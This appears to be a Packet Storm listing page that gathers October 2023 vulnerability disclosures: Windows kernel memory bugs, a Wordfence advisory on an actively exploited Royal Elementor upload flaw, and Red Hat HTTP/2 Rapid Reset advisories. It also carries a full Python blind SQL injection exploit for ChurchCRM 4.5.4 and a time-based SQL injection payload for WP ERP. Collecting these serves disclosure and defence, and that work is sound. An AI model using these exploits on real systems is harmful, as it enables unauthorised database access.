The Microsoft Windows Kernel suffers from out-of-bounds reads and paged pool memory disclosure in VrpUpdateKeyInformation.

Microsoft Windows Kernel Out-Of-Bounds Reads / Memory Disclosure

The Microsoft Windows Kernel suffers from a paged pool memory disclosure in VrpPostEnumerateKey.

Microsoft Windows Kernel Paged Pool Memory Disclosure

WordPress Royal Elementor plugin versions 1.3.78 and below suffer from a remote shell upload vulnerability.

    Today, on October 13, 2023, the Wordfence Threat Intelligence Team became aware of a vulnerability that was recently patched in Royal Elementor Addons and Templates, a WordPress plugin installed on over 200,000 sites, that makes it possible for unauthenticated attackers to upload arbitrary files to vulnerable sites.This allows unauthenticated attackers to upload PHP files containing malicious content, such as a backdoor, that makes remote code execution possible and leads to a complete compromise of the site. We have blocked over 46,169 attacks targeting this vulnerability in the past 30 days, and reviewing our data revealed that attacks started on or around August 30th, 2023, though we also have evidence that the exploit was being actively developed as early as July 27, 2023.All Wordfence users running Premium, Care, or Response, as well as those still running the free version of the Wordfence plugin, are protected by the Wordfence firewall’s built in malicious file upload protection. However, we still strongly encourage users to ensure their sites are updated to the latest patched version of the plugin which is 1.3.79 due to the fact that this vulnerability is being actively exploited.This vulnerability was originally discovered by Fioravante Souza from WPScan, and you can find all applicable references in the Wordfence Intelligence Database.Description: Royal Elementor Addons and Templates <= 1.3.78 – Unauthenticated Arbitrary File Upload Affected Plugin: Royal Elementor Addons and Templates Plugin slug: royal-elementor-addonsVendor: WP RoyalAffected versions: <= 1.3.78CVE ID: CVE-2023-5360CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher: Fioravante Souza(WPScan) Fully Patched Version: 1.3.79Wordfence Intelligence Reference The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 1.3.78. This is due to insufficient file type validation in the handle_file_upload() function called via AJAX which allows attackers to supply a preferred filetype extension to the ‘allowed_file_types‘ parameter, with a special character, which makes it possible for the uploaded file to bypass their filter list. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible.Due to the fact that this vulnerability is being actively exploited, we are keeping information about the technical specifications of this vulnerability limited.Indicators of CompromiseOur earliest indicator that this vulnerability was targeted was on August 30th, well before the vulnerability was patched, however, we only see a few attacks here and there around the early days with attacks starting to ramp up later around October 3rd, 2023. In the past 30 days, we have blocked over 46,169 attacks.A majority of the attacks appear to be coming from just the following three IP Addresses:- 65.21.22.78 with 33,255 attacks blocked.- 2a01:4f9:3080:4eea::2 with 12,289 attacks blocked.- 135.181.181.50 with 206 attacks blocked.>From our data, it appears that attackers have been attempting to place files named b1ack[.]p$hp, which has an md5 hash of 1635f34d9c1da30ff5438e06d3ea6590 and can be used to place additional PHP files on the site, as well as wp.ph$p which has an md5 hash of bac83f216eba23a865c591dbea427f22 and inserts a malicious administrator. The Wordfence scanner has had detection for b1ack[.]p$hp since December 2019, and we have written a signature to detect wp[.]ph$p which will be released as soon as it passes our quality assurance process.b1ack[.]p$hp contains the following code:ray-so-export (6) wp[.]ph$p contains the following code:ray-so-export (7) We recommend all site owners run a malware scan using Wordfence CLI, with the commercial signature set, or the Wordfence plugin, if utilizing the Royal Elementor Addons and Templates plugin to ensure their site has not been compromised as a result of this vulnerability.If you believe your site has been compromised as a result of this vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.ConclusionIn today’s post, we detailed attacks against a critical unauthenticated arbitrary file upload vulnerability in the Royal Elementor Addons and Templates plugin for WordPress that has been patched, but is actively being exploited. This vulnerability can be leveraged to upload a malicious PHP file that will make remote code execution on the server possible.As a reminder, all Wordfence users running Premium, Care, or Response, as well as those still running the free version of the Wordfence plugin, are protected by the Wordfence firewall’s built in malicious file upload protection. However, we still strongly encourage users to ensure their sites are updated to the latest patched version of the plugin which is 1.3.79 due to the fact that this vulnerability is being actively exploited.If you know someone who uses this plugin, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.Special thanks to Ramuel Gall, Wordfence Senior Security Researcher, for assistance researching this vulnerability, analyzing the attack data, and ensuring our users have adequate protection and detection coverage.

WordPress Royal Elementor 1.3.78 Shell Upload

WordPress WP ERP plugin versions 1.12.2 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins WP ERP <= 1.12.2 - SQL Injection# Date: 15-10-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/erp/# Vendor Homepage: https://wperp.com/# Version: 1.12.2# Tested on: Windows, Linux# CVE: CVE-2023-2744# Product DescriptionWP ERP is the first full-fledged ERP (Enterprise Resource Planning) system through which you can simultaneously manage your WordPress site and business from a single platform. WP ERP aims to deliver all your enterprise business requirements with simplicity. With real-time reports and a better way to handle business data, make your operation better managed, away from errors, and prepare your company for the next leap. WP ERP has 3 core modules: HR, CRM, and Accounting, which together make a complete ERP system for any type of business.# Vulnerability overview:The WordPress Plugins WP ERP - Accounting module <= 1.12.2 is vulnerable to Blind SQL Injection (time-based) via the TYPE parameter on /wp-json/erp/v1/accounting/v1/people endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of Concept:Affected Endpoint: /wp-json/erp/v1/accounting/v1/people?type=Affected Parameter: typepayload: customer') AND (SELECT 1 FROM (SELECT SLEEP(3))x) AND ('x'='x# RecommendationUpgrade to version 1.12.4

WordPress WP ERP 1.12.2 SQL Injection

ChurchCRM version 4.5.4 suffers from a remote authenticated blind SQL injection vulnerability.

    # Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid# Date: 03-05-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.4# Tested on: Windows, Linux# CVE: CVE-2023-29842"""The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name. The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.This script is created as Proof of Concept to retrieve the database name and version."""import sys, requestsdef injection(target, inj_str, session_cookies):        for j in range(32, 126):        url = "%s/EditEventTypes.php" % (target)        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}            data = "EN_tyid=%s&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=09:30:00&newCountName=" % (inj_str.replace("[CHAR]", str(j)))        r = requests.post(url, headers=headers, data=data)        res = r.text        if (r.elapsed.total_seconds () > 2 ):            return j    return Nonedef retrieveDBName(session_cookies):       db_name = ""    print("(+) Retrieving database name, please wait")    for i in range (1,100):        injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            sys.stdout.write(chr(retrieved_value))            sys.stdout.flush()                   else:            breakdef retrieveDBVersion(session_cookies):       db_version = ""    print("(+) Retrieving database version, please wait")    for i in range (1,100):        injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            sys.stdout.write(chr(retrieved_value))            sys.stdout.flush()        else:            break    def login(target, username, password):    target = "%s/session/begin" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "User=%s&Password=%s" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)               print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")    retrieveDBName(session_cookies)        print("")    retrieveDBVersion(session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

ChurchCRM 4.5.4 SQL Injection

Red Hat Security Advisory 2023-5714-01 - nginx is a web and proxy server supporting HTTP and other protocols, with a focus on high concurrency, performance, and low memory usage. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5714.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nginx security updateAdvisory ID:        RHSA-2023:5714-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5714Issue date:         2023-10-16Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for nginx is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:nginx is a web and proxy server supporting HTTP and other protocols, with a focus on high concurrency, performance, and low memory usage. Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-5714-01

Red Hat Security Advisory 2023-5713-01 - nginx is a web and proxy server supporting HTTP and other protocols, with a focus on high concurrency, performance, and low memory usage. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5713.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nginx:1.22 security updateAdvisory ID:        RHSA-2023:5713-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5713Issue date:         2023-10-16Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for the nginx:1.22 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:nginx is a web and proxy server supporting HTTP and other protocols, with a focus on high concurrency, performance, and low memory usage. Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-5713-01

Red Hat Security Advisory 2023-5711-01 - nginx is a web and proxy server supporting HTTP and other protocols, with a focus on high concurrency, performance, and low memory usage. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5711.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nginx security updateAdvisory ID:        RHSA-2023:5711-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5711Issue date:         2023-10-16Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for nginx is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:nginx is a web and proxy server supporting HTTP and other protocols, with a focus on high concurrency, performance, and low memory usage. Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-5711-01

Red Hat Security Advisory 2023-5709-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET 7.0 to SDK 7.0.112 and Runtime 7.0.12. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5709.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: dotnet7.0 security updateAdvisory ID:        RHSA-2023:5709-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5709Issue date:         2023-10-16Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for dotnet7.0 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET 7.0 to SDK 7.0.112 and Runtime 7.0.12.Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-5709-01

Red Hat Security Advisory 2023-5708-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET 6.0 to SDK 6.0.123 and Runtime 6.0.23. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5708.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: dotnet6.0 security updateAdvisory ID:        RHSA-2023:5708-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5708Issue date:         2023-10-16Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for dotnet6.0 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are  .NET 6.0 to SDK 6.0.123 and Runtime 6.0.23.Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Source

Packet Storm